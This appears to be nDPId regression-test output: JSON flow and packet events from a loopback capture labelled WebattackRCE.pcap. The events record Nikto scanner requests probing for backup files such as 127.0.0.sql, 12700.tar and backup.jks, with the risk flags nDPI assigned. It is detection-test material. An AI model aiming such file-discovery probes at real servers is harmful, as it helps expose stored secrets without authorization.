00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
